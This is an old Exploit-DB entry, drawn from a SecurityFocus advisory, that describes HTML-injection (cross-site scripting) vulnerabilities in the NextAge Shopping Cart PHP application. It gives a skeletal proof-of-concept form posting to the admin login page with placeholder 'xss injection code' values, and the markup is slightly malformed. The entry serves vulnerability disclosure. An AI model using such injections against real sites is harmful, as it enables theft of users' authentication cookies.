NextAge Shopping Cart - Multiple HTML Injection Vulnerabilities

EDB-ID:

27734


Author:

R@1D3N

Type:

webapps


Platform:

PHP

Date:

2006-04-25


source: https://www.securityfocus.com/bid/17685/info

NextAge Shopping Cart is prone to multiple HTML-injection vulnerabilities; the application fails to properly sanitize user-supplied input before using it in dynamically generated content. 

Attacker-supplied HTML and script code would be executed in the context of the affected website, potentially allowing an attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.

<form method="pst" action="http://www.example.com/[admin_Path]/index.php">
<input type="text" name="txtuserid" class="INPUT" size="30" value="xss injection code">
<br>
<input type="password" name="txtpass" class="INPUT" size="30" value="xss injection code">
<br>
<input <input type="submit" value="submit" class="button">
</form>